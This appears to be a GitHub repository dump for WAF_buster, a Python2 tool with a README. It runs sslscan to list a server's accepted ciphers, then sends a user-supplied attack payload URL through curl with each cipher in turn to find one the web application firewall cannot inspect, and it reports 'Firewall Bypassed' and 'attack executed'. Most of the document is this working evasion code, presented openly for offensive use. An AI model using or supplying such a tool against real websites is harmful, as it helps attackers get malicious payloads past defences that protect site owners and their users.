├── README.md ├── WAF_buster.py └── screenshots ├── waf.png └── woof.png /README.md: -------------------------------------------------------------------------------- 1 | # WAF_buster 2 | Disrupt WAF by abusing SSL/TLS Ciphers 3 | 4 | # About WAF_buster 5 | This tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end.(Reference:https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html).It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that "Firewall is bypassed". 6 | 7 | ## Screenshots 8 | 9 | ![WAF_buster](https://raw.github.com/viperbluff/WAF_buster/master/screenshots/woof.png) 10 | 11 | 12 | ## Installation 13 | 14 | > **git clone https://github.com/viperbluff/WAF_buster.git** 15 | 16 | ## Python2 17 | 18 | This tool has been created using Python2 and below modules have been used throughout:- 19 | 20 | 1.requests 21 | 22 | 2.os 23 | 24 | 3.sys 25 | 26 | 4.subprocess 27 | 28 | ## Usage 29 | 30 | > **Open terminal** 31 | 32 | > **python2 WAF_buster.py --input** 33 | 34 | ![Usage](https://raw.github.com/viperbluff/WAF_buster/master/screenshots/waf.png) 35 | 36 | ## Credits 37 | 38 | Sahil Tikoo 39 | 40 | Hacker 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /WAF_buster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import sys 4 | import subprocess 5 | import requests as re 6 | import os 7 | 8 | def banner(): 9 | print "[*]Usage: python WAF_buster.py --input" 10 | print "[*]Run this script only if the Payload_URL is getting blocked by firewall " 11 | 12 | def check_response(argument): 13 | f=re.get(argument) 14 | g=f.status_code 15 | return g 16 | 17 | def ssl_check(Domain,Site_Payload,Payload): 18 | file1=subprocess.Popen(["sslscan",Domain],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 19 | output1,error1=file1.communicate() 20 | if "Could not resolve hostname" in output1: 21 | print "Some issues occured , Please Try Again !!!" 22 | main() 23 | else: 24 | open_file=open("file.txt",'w') 25 | open_file.write(output1) 26 | open_file.close() 27 | 28 | file_open=open("file.txt",'r') 29 | file22=open("cipher.txt",'w') 30 | 31 | for line in file_open: 32 | if "Accepted" in line or "Preferred" in line: 33 | file22.write(line) 34 | else: 35 | continue 36 | 37 | file22.close() 38 | file_open.close() 39 | 40 | fi= open("escape_char_cipher.txt",'w') 41 | fm=open("cipher.txt",'r') 42 | 43 | for line in fm: 44 | line=line.split(' ') 45 | if len(line)<6: 46 | continue 47 | elif "Accepted" in line[0]: 48 | line=line[7] 49 | fi.write(line+"\n") 50 | else: 51 | line=line[6] 52 | fi.write(line+"\n") 53 | fm.close() 54 | fi.close() 55 | 56 | T1=open("escape_char_cipher.txt",'r') 57 | T2=open("final_cipher.txt",'w') 58 | 59 | for i in T1: 60 | if "32m" in i: 61 | i=i.lstrip("\x1b[32m") 62 | T2.write(i) 63 | elif "33m" in i: 64 | i=i.lstrip("\x1b[32m") 65 | T2.write(i) 66 | else: 67 | T2.write(i) 68 | T1.close() 69 | T2.close() 70 | 71 | try: 72 | cipher_open=open("final_cipher.txt",'r') 73 | for i in cipher_open: 74 | file2=subprocess.Popen(["curl","--ciphers",i,Site_Payload],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 75 | output2,error2=file2.communicate() 76 | request=str(check_response(Site_Payload)) 77 | if request in output2: 78 | print "\n\033[32mFirewall blocked Cipher %s\033[0m" %i 79 | elif Payload in output2: 80 | print "\n\033[32mFirewall Bypassed using Cipher:%s\033[0m" %i 81 | print "And attack executed" 82 | else: 83 | print "\n\033[32mFirewall Bypassed using Cipher:%s\033[0m" %i 84 | print "But attack blocked" 85 | cipher_open.close() 86 | except Exception as ex: 87 | print ex 88 | 89 | def main(): 90 | if len(sys.argv)<2: 91 | banner() 92 | elif sys.argv[1]!= "--input": 93 | banner() 94 | else: 95 | Domain=raw_input("[1] Enter The Domain Or Subdomain with http:// or https://:\t") 96 | if "http" not in Domain or "https" not in Domain: 97 | print "Please Specify the protocol Schema" 98 | main() 99 | Site_Payload=raw_input("[2] Enter The Domain Or Subdomain alongwith the Payload:\t") 100 | if "http" not in Domain or "https" not in Domain: 101 | print "Please Specify the protocol Schema" 102 | main() 103 | Payload=raw_input("[3] Enter the Payload:\t") 104 | ssl_check(Domain,Site_Payload,Payload) 105 | main() 106 | 107 | -------------------------------------------------------------------------------- /screenshots/waf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/viperbluff/WAF_buster/1cd5f795ec7dc4d68d2c5d76f3ee38afbde07379/screenshots/waf.png -------------------------------------------------------------------------------- /screenshots/woof.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/viperbluff/WAF_buster/1cd5f795ec7dc4d68d2c5d76f3ee38afbde07379/screenshots/woof.png --------------------------------------------------------------------------------